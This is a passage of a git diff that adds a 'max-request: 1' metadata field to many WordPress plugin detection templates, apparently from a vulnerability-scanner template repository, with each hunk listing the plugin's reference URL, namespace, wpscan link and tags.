https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index deee1b309f..4061421104 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git 